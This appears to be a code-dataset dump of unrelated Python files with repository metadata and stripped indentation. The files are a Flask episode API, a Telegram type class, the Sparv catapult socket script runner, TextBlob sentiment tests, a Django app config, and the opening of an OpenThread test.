@app.errorhandler(500)
def server_error(e):
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
return app
| import logging
from episodes import find_updates, db, count_all
from logging import error as logi
from flask import Flask, jsonify, request
def create_app(config, debug=False, testing=False, config_overrides=None):
app = Flask(__name__)
app.config.from_object(config)
app.config['JSON_AS_ASCII'] = False
app.debug = debug
app.testing = testing
if config_overrides:
app.config.update(config_overrides)
# Configure logging
if not app.testing:
logging.basicConfig(level=logging.INFO)
@app.before_request
def before_request():
db.connect()
@app.after_request
def after_request(response):
db.close()
return response
@app.route('/get_new_episodes')
def get_new_episodes():
appengine_request = request.headers.get('X-Appengine-Cron')
if appengine_request == 'true':
from scraper import update_episodes
update_episodes()
return '<h1>Success</h1>'
else:
return '<h1>This is a crobjob and all the requests should come from appengine.</h1>'
@app.route('/get_updates')
def get_update():
timestamp = request.args.get('timestamp', '')
if timestamp == '':
logi('Default timestamp')
timestamp = 0
else:
timestamp = long(timestamp)
result = find_updates(timestamp)
return jsonify(result)
@app.route('/')
def welcome():
message = '{}{}{}{}'.format('<h1>Welcome to FardaStationAPI WebService</h1>',
'<p>To get information about the latest episodes of Fardaa Station (by '
'RadioFarda.com) please send a GET request to '
'http://fardastationapi.appspot.com/get_updates URL.</p>',
'<p>A UNIX epoch timestamp can also be passed in as an argument to filter out the '
'episodes before that timestamp. Example: '
'https://fardastationapi.appspot.com/get_updates?timestamp=1512629949</p>',
'<h1>Current number of episodes: {}</h1>'.format(count_all()))
return message
# Add an error handler. This is useful for debugging the live application,
# however, you should disable the output of the exception for production
# applications.
@app.errorhandler(500)
def server_error(e):
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
return app
| en | 0.809759 | # Configure logging # Add an error handler. This is useful for debugging the live application, # however, you should disable the output of the exception for production # applications. An internal error occurred: <pre>{}</pre> See logs for full stacktrace. | 2.239657 | 2 |
pytglib/api/types/can_transfer_ownership_result_password_too_fresh.py | iTeam-co/pytglib | 6 | 8071 | <filename>pytglib/api/types/can_transfer_ownership_result_password_too_fresh.py
from ..utils import Object
class CanTransferOwnershipResultPasswordTooFresh(Object):
"""
The 2-step verification was enabled recently, user needs to wait
Attributes:
ID (:obj:`str`): ``CanTransferOwnershipResultPasswordTooFresh``
Args:
retry_after (:obj:`int`):
Time left before the session can be used to transfer ownership of a chat, in seconds
Returns:
CanTransferOwnershipResult
Raises:
:class:`telegram.Error`
"""
ID = "canTransferOwnershipResultPasswordTooFresh"
def __init__(self, retry_after, **kwargs):
self.retry_after = retry_after # int
@staticmethod
def read(q: dict, *args) -> "CanTransferOwnershipResultPasswordTooFresh":
retry_after = q.get('retry_after')
return CanTransferOwnershipResultPasswordTooFresh(retry_after)
| <filename>pytglib/api/types/can_transfer_ownership_result_password_too_fresh.py
from ..utils import Object
class CanTransferOwnershipResultPasswordTooFresh(Object):
"""
The 2-step verification was enabled recently, user needs to wait
Attributes:
ID (:obj:`str`): ``CanTransferOwnershipResultPasswordTooFresh``
Args:
retry_after (:obj:`int`):
Time left before the session can be used to transfer ownership of a chat, in seconds
Returns:
CanTransferOwnershipResult
Raises:
:class:`telegram.Error`
"""
ID = "canTransferOwnershipResultPasswordTooFresh"
def __init__(self, retry_after, **kwargs):
self.retry_after = retry_after # int
@staticmethod
def read(q: dict, *args) -> "CanTransferOwnershipResultPasswordTooFresh":
retry_after = q.get('retry_after')
return CanTransferOwnershipResultPasswordTooFresh(retry_after)
| en | 0.757871 | The 2-step verification was enabled recently, user needs to wait Attributes: ID (:obj:`str`): ``CanTransferOwnershipResultPasswordTooFresh`` Args: retry_after (:obj:`int`): Time left before the session can be used to transfer ownership of a chat, in seconds Returns: CanTransferOwnershipResult Raises: :class:`telegram.Error` # int | 2.251375 | 2 |
catapult.py | spraakbanken/sparv-catapult | 0 | 8072 | # -*- coding: utf-8 -*-
# catapult: runs python scripts in already running processes to eliminate the
# python interpreter startup time.
#
# The lexicon for sparv.saldo.annotate and sparv.saldo.compound can be pre-loaded and
# shared between processes. See the variable annotators in handle and start.
#
# Run scripts in the catapult with the c program catalaunch.
from builtins import range, object
from multiprocessing import Process, cpu_count
from decorator import decorator
import logging
import os
import re
import runpy
import socket
import sys
import traceback
import sparv.util as util
RECV_LEN = 4096
# Important to preload all modules otherwise processes will need to do
# it upon request, introducing new delays.
#
# These imports uses the __all__ variables in the __init__ files.
from sparv.util import *
from sparv import *
logging.basicConfig(format="%(process)d %(asctime)-15s %(message)s")
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
"""
Splits at every space that is not preceded by a backslash.
"""
splitter = re.compile('(?<!\\\\) ')
def set_last_argument(*values):
"""
Decorates a function f, setting its last argument(s) to the given value(s).
Used for setting the saldo lexicons to sparv.saldo.annotate and
sparv.saldo.compound, and the process "dictionary" to sparv.malt.maltparse.
The decorator module is used to give the same signature and
docstring to the function, which is exploited in sparv.util.run.
"""
@decorator
def inner(f, *args, **kwargs):
args = list(args)
for v in values:
args.pop()
for v in values:
args.append(v)
f(*args, **kwargs)
return inner
def handle(client_sock, verbose, annotators):
"""
Handle a client: parse the arguments, change to the relevant
directory, then run the script. Stdout and stderr are directed
to /dev/null or to the client socket.
"""
def chunk_send(msg):
"""
Sends a message chunk until it is totally received in the other end
"""
msg = msg.encode(util.UTF8)
while len(msg) > 0:
sent = client_sock.send(msg)
if sent == 0:
raise RuntimeError("socket connection broken")
msg = msg[sent:]
def set_stdout_stderr():
"""
Put stdout and stderr to the client_sock, if verbose.
Returns the clean-up handler.
"""
class Writer(object):
def write(self, msg):
log.debug(msg)
if verbose:
chunk_send(msg)
def flush(self):
pass
orig_stds = sys.stdout, sys.stderr
w = Writer()
sys.stdout = w
sys.stderr = w
def cleanup():
"""
Restores stdout and stderr
"""
sys.stdout = orig_stds[0]
sys.stderr = orig_stds[1]
client_sock.close()
return cleanup
# Receive data
data = b""
new_data = None
# Message is terminated with a lone \
while new_data is None or not new_data.endswith(b'\\'):
new_data = client_sock.recv(RECV_LEN)
log.debug("Received %s", new_data)
data += new_data
if len(new_data) == 0:
log.warning("Received null!")
chunk_send("Error when receiving: got an empty message")
return
# Drop the terminating \
data = data[0:-1]
# Split arguments on spaces, and replace '\ ' to ' ' and \\ to \
args = [arg.replace('\\ ', ' ').replace('\\\\', '\\')
for arg in re.split(splitter, data.decode(util.UTF8))]
log.debug("Args: %s", args)
### PING? ###
if len(args) == 2 and args[1] == "PING":
log.info("Ping requested")
chunk_send("PONG")
return
# If the first argument is -m, the following argument is a module
# name instead of a script name
module_flag = len(args) > 2 and args[1] == '-m'
if module_flag:
args.pop(1)
if len(args) > 1:
# First argument is the pwd of the caller
old_pwd = os.getcwd()
pwd = args.pop(0)
log.info('Running %s', args[0])
log.debug('with arguments: %s', ' '.join(args[1:]))
log.debug('in directory %s', pwd)
# Set stdout and stderr, which returns the cleaup function
cleanup = set_stdout_stderr()
# Run the command
try:
sys.argv = args
os.chdir(pwd)
if module_flag:
annotator = annotators.get(args[0], None)
if not annotator:
# some of the annotators require two arguments
annotator = annotators.get((args[0], args[1]), None)
if annotator:
# skip the first argument now
sys.argv = args[0]
sys.argv.extend(args[2:])
if annotator:
util.run.main(annotator)
else:
runpy.run_module(args[0], run_name='__main__')
else:
runpy.run_path(args[0], run_name='__main__')
except (ImportError, IOError):
# If file does not exist, send the error message
chunk_send("%s\n" % sys.exc_info()[1])
cleanup()
log.exception("File does not exist")
except:
# Send other errors, and if verbose, send tracebacks
chunk_send("%s\n" % sys.exc_info()[1])
traceback.print_exception(*sys.exc_info())
cleanup()
log.exception("Unknown error")
else:
cleanup()
os.chdir(old_pwd)
# Run the cleanup function if there is one (only used with malt)
annotators.get((args[0], 'cleanup'), lambda: None)()
log.info('Completed %s', args[0])
else:
log.info('Cannot handle %s', data)
chunk_send('Cannot handle %s\n' % data)
def worker(server_socket, verbose, annotators, malt_args=None, swener_args=None):
"""
Workers listen to the socket server, and handle incoming requests
Each process starts an own maltparser process, because they are
cheap and cannot serve multiple clients at the same time.
"""
if malt_args:
process_dict = dict(process=None, restart=True)
def start_malt():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
malt_process = malt.maltstart(**malt_args)
if verbose:
log.info('(Re)started malt process: %s', malt_process)
process_dict['process'] = malt_process
annotators['sparv.malt'] = set_last_argument(process_dict)(malt.maltparse)
elif verbose:
log.info("Not restarting malt this time")
start_malt()
annotators['sparv.malt', 'cleanup'] = start_malt
if swener_args:
process_dict = dict(process=None, restart=True)
def start_swener():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
swener_process = swener.swenerstart(**swener_args)
if verbose:
log.info('(Re)started SweNER process: %s', swener_process)
process_dict['process'] = swener_process
annotators['sparv.swener'] = set_last_argument(process_dict)(swener.tag_ne)
elif verbose:
log.info("Not restarting SweNER this time")
start_swener()
annotators['sparv.swener', 'cleanup'] = start_swener
if verbose:
log.info("Worker running!")
while True:
client_sock, addr = server_socket.accept()
try:
handle(client_sock, verbose, annotators)
except:
log.exception('Error in handling code')
traceback.print_exception(*sys.exc_info())
client_sock.close()
def start(socket_path, processes=1, verbose='false',
saldo_model=None, compound_model=None, stats_model=None,
dalin_model=None, swedberg_model=None, blingbring_model=None,
malt_jar=None, malt_model=None, malt_encoding=util.UTF8,
sentiment_model=None, swefn_model=None, swener=False,
swener_encoding=util.UTF8):
"""
Starts a catapult on a socket file, using a number of processes.
If verbose is false, all stdout and stderr programs produce is
piped to /dev/null, otherwise it is sent to the client. The
computation is done by the catapult processes, however.
Regardless of what verbose is, client errors should be reported
both in the catapult and to the client.
The saldo model and compound model can be pre-loaded and shared in
memory between processes.
Start processes using catalaunch.
"""
if os.path.exists(socket_path):
log.error('socket %s already exists', socket_path)
exit(1)
verbose = verbose.lower() == 'true'
log.info('Verbose: %s', verbose)
# If processes does not contain an int, set it to the number of processors
try:
processes = int(processes)
except:
processes = cpu_count()
# Start the socket
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_socket.bind(socket_path)
server_socket.listen(processes)
# The dictionary of functions with saved lexica, indexed by module name strings
annotators = {}
# Load Saldo and older lexicons
lexicons = [m for m in [saldo_model, dalin_model, swedberg_model] if m]
if lexicons:
lexicon_dict = {}
for lexicon in lexicons:
lexicon_dict[os.path.basename(lexicon).rstrip(".pickle")] = saldo.SaldoLexicon(lexicon)
annotators['sparv.saldo'] = set_last_argument(lexicon_dict)(saldo.annotate)
if stats_model and compound_model:
annotators['sparv.compound'] = set_last_argument(
compound.SaldoCompLexicon(compound_model),
compound.StatsLexicon(stats_model))(compound.annotate)
elif compound_model:
annotators['sparv.compound_simple'] = set_last_argument(
compound_simple.SaldoLexicon(compound_model))(compound_simple.annotate)
# if blingbring_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(blingbring_model))(lexical_classes.annotate_bb_words)
# if swefn_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(swefn_model))(lexical_classes.annotate_swefn_words)
if sentiment_model:
annotators['sparv.sentiment'] = set_last_argument(
util.PickledLexicon(sentiment_model))(sentiment.sentiment)
# if models_1700s:
# models = models_1700s.split()
# lexicons = [saldo.SaldoLexicon(lex) for lex in models]
# annotators[('sparv.fsv', '--annotate_fallback')] = set_last_argument(lexicons)(fsv.annotate_fallback)
# annotators[('sparv.fsv', '--annotate_full')] = set_last_argument(lexicons)(fsv.annotate_full)
if verbose:
log.info('Loaded annotators: %s', list(annotators.keys()))
if malt_jar and malt_model:
malt_args = dict(maltjar=malt_jar, model=malt_model,
encoding=malt_encoding, send_empty_sentence=True)
else:
malt_args = None
if swener:
swener_args = dict(stdin="", encoding=swener_encoding, verbose=True)
else:
swener_args = None
# Start processes-1 workers
workers = [Process(target=worker, args=[server_socket, verbose, annotators, malt_args])
for i in range(processes - 1)]
for p in workers:
p.start()
# Additionally, let this thread be worker 0
worker(server_socket, verbose, annotators, malt_args, swener_args)
if __name__ == '__main__':
util.run.main(start)
| # -*- coding: utf-8 -*-
# catapult: runs python scripts in already running processes to eliminate the
# python interpreter startup time.
#
# The lexicon for sparv.saldo.annotate and sparv.saldo.compound can be pre-loaded and
# shared between processes. See the variable annotators in handle and start.
#
# Run scripts in the catapult with the c program catalaunch.
from builtins import range, object
from multiprocessing import Process, cpu_count
from decorator import decorator
import logging
import os
import re
import runpy
import socket
import sys
import traceback
import sparv.util as util
RECV_LEN = 4096
# Important to preload all modules otherwise processes will need to do
# it upon request, introducing new delays.
#
# These imports uses the __all__ variables in the __init__ files.
from sparv.util import *
from sparv import *
logging.basicConfig(format="%(process)d %(asctime)-15s %(message)s")
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
"""
Splits at every space that is not preceded by a backslash.
"""
splitter = re.compile('(?<!\\\\) ')
def set_last_argument(*values):
"""
Decorates a function f, setting its last argument(s) to the given value(s).
Used for setting the saldo lexicons to sparv.saldo.annotate and
sparv.saldo.compound, and the process "dictionary" to sparv.malt.maltparse.
The decorator module is used to give the same signature and
docstring to the function, which is exploited in sparv.util.run.
"""
@decorator
def inner(f, *args, **kwargs):
args = list(args)
for v in values:
args.pop()
for v in values:
args.append(v)
f(*args, **kwargs)
return inner
def handle(client_sock, verbose, annotators):
"""
Handle a client: parse the arguments, change to the relevant
directory, then run the script. Stdout and stderr are directed
to /dev/null or to the client socket.
"""
def chunk_send(msg):
"""
Sends a message chunk until it is totally received in the other end
"""
msg = msg.encode(util.UTF8)
while len(msg) > 0:
sent = client_sock.send(msg)
if sent == 0:
raise RuntimeError("socket connection broken")
msg = msg[sent:]
def set_stdout_stderr():
"""
Put stdout and stderr to the client_sock, if verbose.
Returns the clean-up handler.
"""
class Writer(object):
def write(self, msg):
log.debug(msg)
if verbose:
chunk_send(msg)
def flush(self):
pass
orig_stds = sys.stdout, sys.stderr
w = Writer()
sys.stdout = w
sys.stderr = w
def cleanup():
"""
Restores stdout and stderr
"""
sys.stdout = orig_stds[0]
sys.stderr = orig_stds[1]
client_sock.close()
return cleanup
# Receive data
data = b""
new_data = None
# Message is terminated with a lone \
while new_data is None or not new_data.endswith(b'\\'):
new_data = client_sock.recv(RECV_LEN)
log.debug("Received %s", new_data)
data += new_data
if len(new_data) == 0:
log.warning("Received null!")
chunk_send("Error when receiving: got an empty message")
return
# Drop the terminating \
data = data[0:-1]
# Split arguments on spaces, and replace '\ ' to ' ' and \\ to \
args = [arg.replace('\\ ', ' ').replace('\\\\', '\\')
for arg in re.split(splitter, data.decode(util.UTF8))]
log.debug("Args: %s", args)
### PING? ###
if len(args) == 2 and args[1] == "PING":
log.info("Ping requested")
chunk_send("PONG")
return
# If the first argument is -m, the following argument is a module
# name instead of a script name
module_flag = len(args) > 2 and args[1] == '-m'
if module_flag:
args.pop(1)
if len(args) > 1:
# First argument is the pwd of the caller
old_pwd = os.getcwd()
pwd = args.pop(0)
log.info('Running %s', args[0])
log.debug('with arguments: %s', ' '.join(args[1:]))
log.debug('in directory %s', pwd)
# Set stdout and stderr, which returns the cleaup function
cleanup = set_stdout_stderr()
# Run the command
try:
sys.argv = args
os.chdir(pwd)
if module_flag:
annotator = annotators.get(args[0], None)
if not annotator:
# some of the annotators require two arguments
annotator = annotators.get((args[0], args[1]), None)
if annotator:
# skip the first argument now
sys.argv = args[0]
sys.argv.extend(args[2:])
if annotator:
util.run.main(annotator)
else:
runpy.run_module(args[0], run_name='__main__')
else:
runpy.run_path(args[0], run_name='__main__')
except (ImportError, IOError):
# If file does not exist, send the error message
chunk_send("%s\n" % sys.exc_info()[1])
cleanup()
log.exception("File does not exist")
except:
# Send other errors, and if verbose, send tracebacks
chunk_send("%s\n" % sys.exc_info()[1])
traceback.print_exception(*sys.exc_info())
cleanup()
log.exception("Unknown error")
else:
cleanup()
os.chdir(old_pwd)
# Run the cleanup function if there is one (only used with malt)
annotators.get((args[0], 'cleanup'), lambda: None)()
log.info('Completed %s', args[0])
else:
log.info('Cannot handle %s', data)
chunk_send('Cannot handle %s\n' % data)
def worker(server_socket, verbose, annotators, malt_args=None, swener_args=None):
"""
Workers listen to the socket server, and handle incoming requests
Each process starts an own maltparser process, because they are
cheap and cannot serve multiple clients at the same time.
"""
if malt_args:
process_dict = dict(process=None, restart=True)
def start_malt():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
malt_process = malt.maltstart(**malt_args)
if verbose:
log.info('(Re)started malt process: %s', malt_process)
process_dict['process'] = malt_process
annotators['sparv.malt'] = set_last_argument(process_dict)(malt.maltparse)
elif verbose:
log.info("Not restarting malt this time")
start_malt()
annotators['sparv.malt', 'cleanup'] = start_malt
if swener_args:
process_dict = dict(process=None, restart=True)
def start_swener():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
swener_process = swener.swenerstart(**swener_args)
if verbose:
log.info('(Re)started SweNER process: %s', swener_process)
process_dict['process'] = swener_process
annotators['sparv.swener'] = set_last_argument(process_dict)(swener.tag_ne)
elif verbose:
log.info("Not restarting SweNER this time")
start_swener()
annotators['sparv.swener', 'cleanup'] = start_swener
if verbose:
log.info("Worker running!")
while True:
client_sock, addr = server_socket.accept()
try:
handle(client_sock, verbose, annotators)
except:
log.exception('Error in handling code')
traceback.print_exception(*sys.exc_info())
client_sock.close()
def start(socket_path, processes=1, verbose='false',
saldo_model=None, compound_model=None, stats_model=None,
dalin_model=None, swedberg_model=None, blingbring_model=None,
malt_jar=None, malt_model=None, malt_encoding=util.UTF8,
sentiment_model=None, swefn_model=None, swener=False,
swener_encoding=util.UTF8):
"""
Starts a catapult on a socket file, using a number of processes.
If verbose is false, all stdout and stderr programs produce is
piped to /dev/null, otherwise it is sent to the client. The
computation is done by the catapult processes, however.
Regardless of what verbose is, client errors should be reported
both in the catapult and to the client.
The saldo model and compound model can be pre-loaded and shared in
memory between processes.
Start processes using catalaunch.
"""
if os.path.exists(socket_path):
log.error('socket %s already exists', socket_path)
exit(1)
verbose = verbose.lower() == 'true'
log.info('Verbose: %s', verbose)
# If processes does not contain an int, set it to the number of processors
try:
processes = int(processes)
except:
processes = cpu_count()
# Start the socket
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_socket.bind(socket_path)
server_socket.listen(processes)
# The dictionary of functions with saved lexica, indexed by module name strings
annotators = {}
# Load Saldo and older lexicons
lexicons = [m for m in [saldo_model, dalin_model, swedberg_model] if m]
if lexicons:
lexicon_dict = {}
for lexicon in lexicons:
lexicon_dict[os.path.basename(lexicon).rstrip(".pickle")] = saldo.SaldoLexicon(lexicon)
annotators['sparv.saldo'] = set_last_argument(lexicon_dict)(saldo.annotate)
if stats_model and compound_model:
annotators['sparv.compound'] = set_last_argument(
compound.SaldoCompLexicon(compound_model),
compound.StatsLexicon(stats_model))(compound.annotate)
elif compound_model:
annotators['sparv.compound_simple'] = set_last_argument(
compound_simple.SaldoLexicon(compound_model))(compound_simple.annotate)
# if blingbring_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(blingbring_model))(lexical_classes.annotate_bb_words)
# if swefn_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(swefn_model))(lexical_classes.annotate_swefn_words)
if sentiment_model:
annotators['sparv.sentiment'] = set_last_argument(
util.PickledLexicon(sentiment_model))(sentiment.sentiment)
# if models_1700s:
# models = models_1700s.split()
# lexicons = [saldo.SaldoLexicon(lex) for lex in models]
# annotators[('sparv.fsv', '--annotate_fallback')] = set_last_argument(lexicons)(fsv.annotate_fallback)
# annotators[('sparv.fsv', '--annotate_full')] = set_last_argument(lexicons)(fsv.annotate_full)
if verbose:
log.info('Loaded annotators: %s', list(annotators.keys()))
if malt_jar and malt_model:
malt_args = dict(maltjar=malt_jar, model=malt_model,
encoding=malt_encoding, send_empty_sentence=True)
else:
malt_args = None
if swener:
swener_args = dict(stdin="", encoding=swener_encoding, verbose=True)
else:
swener_args = None
# Start processes-1 workers
workers = [Process(target=worker, args=[server_socket, verbose, annotators, malt_args])
for i in range(processes - 1)]
for p in workers:
p.start()
# Additionally, let this thread be worker 0
worker(server_socket, verbose, annotators, malt_args, swener_args)
if __name__ == '__main__':
util.run.main(start)
| en | 0.765183 | # -*- coding: utf-8 -*- # catapult: runs python scripts in already running processes to eliminate the # python interpreter startup time. # # The lexicon for sparv.saldo.annotate and sparv.saldo.compound can be pre-loaded and # shared between processes. See the variable annotators in handle and start. # # Run scripts in the catapult with the c program catalaunch. # Important to preload all modules otherwise processes will need to do # it upon request, introducing new delays. # # These imports uses the __all__ variables in the __init__ files. Splits at every space that is not preceded by a backslash. Decorates a function f, setting its last argument(s) to the given value(s). Used for setting the saldo lexicons to sparv.saldo.annotate and sparv.saldo.compound, and the process "dictionary" to sparv.malt.maltparse. The decorator module is used to give the same signature and docstring to the function, which is exploited in sparv.util.run. Handle a client: parse the arguments, change to the relevant directory, then run the script. Stdout and stderr are directed to /dev/null or to the client socket. Sends a message chunk until it is totally received in the other end Put stdout and stderr to the client_sock, if verbose. Returns the clean-up handler. Restores stdout and stderr # Receive data # Message is terminated with a lone \ # Drop the terminating \ # Split arguments on spaces, and replace '\ ' to ' ' and \\ to \ ### PING? ### # If the first argument is -m, the following argument is a module # name instead of a script name # First argument is the pwd of the caller # Set stdout and stderr, which returns the cleaup function # Run the command # some of the annotators require two arguments # skip the first argument now # If file does not exist, send the error message # Send other errors, and if verbose, send tracebacks # Run the cleanup function if there is one (only used with malt) Workers listen to the socket server, and handle incoming requests Each process starts an own maltparser process, because they are cheap and cannot serve multiple clients at the same time. Starts a catapult on a socket file, using a number of processes. If verbose is false, all stdout and stderr programs produce is piped to /dev/null, otherwise it is sent to the client. The computation is done by the catapult processes, however. Regardless of what verbose is, client errors should be reported both in the catapult and to the client. The saldo model and compound model can be pre-loaded and shared in memory between processes. Start processes using catalaunch. # If processes does not contain an int, set it to the number of processors # Start the socket # The dictionary of functions with saved lexica, indexed by module name strings # Load Saldo and older lexicons # if blingbring_model: # annotators['sparv.lexical_classes'] = set_last_argument( # util.PickledLexicon(blingbring_model))(lexical_classes.annotate_bb_words) # if swefn_model: # annotators['sparv.lexical_classes'] = set_last_argument( # util.PickledLexicon(swefn_model))(lexical_classes.annotate_swefn_words) # if models_1700s: # models = models_1700s.split() # lexicons = [saldo.SaldoLexicon(lex) for lex in models] # annotators[('sparv.fsv', '--annotate_fallback')] = set_last_argument(lexicons)(fsv.annotate_fallback) # annotators[('sparv.fsv', '--annotate_full')] = set_last_argument(lexicons)(fsv.annotate_full) # Start processes-1 workers # Additionally, let this thread be worker 0 | 2.301459 | 2 |
tests/test_sentiments.py | rajeshkumargp/TextBlob | 6,608 | 8073 | <reponame>rajeshkumargp/TextBlob
from __future__ import unicode_literals
import unittest
from nose.tools import * # PEP8 asserts
from nose.plugins.attrib import attr
from textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer, DISCRETE, CONTINUOUS
class TestPatternSentiment(unittest.TestCase):
def setUp(self):
self.analyzer = PatternAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, CONTINUOUS)
def test_analyze(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1)
n1_result = self.analyzer.analyze(n1)
assert_true(p1_result[0] > 0)
assert_true(n1_result[0] < 0)
assert_equal(p1_result.polarity, p1_result[0])
assert_equal(p1_result.subjectivity, p1_result[1])
def test_analyze_assessments(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1,keep_assessments=True)
n1_result = self.analyzer.analyze(n1,keep_assessments=True)
p1_assessment = p1_result.assessments[0]
n1_assessment = n1_result.assessments[0]
assert_true(p1_assessment[1] > 0)
assert_true(n1_assessment[1] < 0)
assert_equal(p1_result.polarity, p1_assessment[1])
assert_equal(p1_result.subjectivity, p1_assessment[2])
class TestNaiveBayesAnalyzer(unittest.TestCase):
def setUp(self):
self.analyzer = NaiveBayesAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, DISCRETE)
@attr('slow')
def test_analyze(self):
p1 = 'I feel great this morning.'
n1 = 'This is a terrible car.'
p1_result = self.analyzer.analyze(p1)
assert_equal(p1_result[0], 'pos')
assert_equal(self.analyzer.analyze(n1)[0], 'neg')
# The 2nd item should be the probability that it is positive
assert_true(isinstance(p1_result[1], float))
# 3rd item is probability that it is negative
assert_true(isinstance(p1_result[2], float))
assert_about_equal(p1_result[1] + p1_result[2], 1)
assert_equal(p1_result.classification, p1_result[0])
assert_equal(p1_result.p_pos, p1_result[1])
assert_equal(p1_result.p_neg, p1_result[2])
def assert_about_equal(first, second, places=4):
return assert_equal(round(first, places), second)
if __name__ == '__main__':
unittest.main()
| from __future__ import unicode_literals
import unittest
from nose.tools import * # PEP8 asserts
from nose.plugins.attrib import attr
from textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer, DISCRETE, CONTINUOUS
class TestPatternSentiment(unittest.TestCase):
def setUp(self):
self.analyzer = PatternAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, CONTINUOUS)
def test_analyze(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1)
n1_result = self.analyzer.analyze(n1)
assert_true(p1_result[0] > 0)
assert_true(n1_result[0] < 0)
assert_equal(p1_result.polarity, p1_result[0])
assert_equal(p1_result.subjectivity, p1_result[1])
def test_analyze_assessments(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1,keep_assessments=True)
n1_result = self.analyzer.analyze(n1,keep_assessments=True)
p1_assessment = p1_result.assessments[0]
n1_assessment = n1_result.assessments[0]
assert_true(p1_assessment[1] > 0)
assert_true(n1_assessment[1] < 0)
assert_equal(p1_result.polarity, p1_assessment[1])
assert_equal(p1_result.subjectivity, p1_assessment[2])
class TestNaiveBayesAnalyzer(unittest.TestCase):
def setUp(self):
self.analyzer = NaiveBayesAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, DISCRETE)
@attr('slow')
def test_analyze(self):
p1 = 'I feel great this morning.'
n1 = 'This is a terrible car.'
p1_result = self.analyzer.analyze(p1)
assert_equal(p1_result[0], 'pos')
assert_equal(self.analyzer.analyze(n1)[0], 'neg')
# The 2nd item should be the probability that it is positive
assert_true(isinstance(p1_result[1], float))
# 3rd item is probability that it is negative
assert_true(isinstance(p1_result[2], float))
assert_about_equal(p1_result[1] + p1_result[2], 1)
assert_equal(p1_result.classification, p1_result[0])
assert_equal(p1_result.p_pos, p1_result[1])
assert_equal(p1_result.p_neg, p1_result[2])
def assert_about_equal(first, second, places=4):
return assert_equal(round(first, places), second)
if __name__ == '__main__':
unittest.main() | en | 0.964436 | # PEP8 asserts # The 2nd item should be the probability that it is positive # 3rd item is probability that it is negative | 2.613345 | 3 |
src/unicef_security/apps.py | unicef/unicef-security | 0 | 8074 | <reponame>unicef/unicef-security
from django.apps import AppConfig
class Config(AppConfig):
name = 'unicef_security'
verbose_name = "UNICEF Security"
| from django.apps import AppConfig
class Config(AppConfig):
name = 'unicef_security'
verbose_name = "UNICEF Security" | none | 1 | 1.145537 | 1 |
|
utils/pretty-tests.py | isJuhn/pcsx2_ipc | 7 | 8075 | <gh_stars>1-10
import json
import sys
f=open(sys.argv[1])
y = json.loads(f.read())
print("Tests results: " + str(y["result"]))
print("Tests duration: " + str(y["duration"]))
print("Tests output:\n~~~~~~~~~~~~~~~~~~~~\n" + str(y["stdout"]))
| import json
import sys
f=open(sys.argv[1])
y = json.loads(f.read())
print("Tests results: " + str(y["result"]))
print("Tests duration: " + str(y["duration"]))
print("Tests output:\n~~~~~~~~~~~~~~~~~~~~\n" + str(y["stdout"])) | none | 1 | 2.811933 | 3 |
|
tests/scripts/thread-cert/test_network_layer.py | AdityaHPatwardhan/openthread | 2,962 | 8076 | <gh_stars>1000+
#!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import io
import random
import struct
import unittest
import common
import network_layer
def any_eid():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_mac_extended_address():
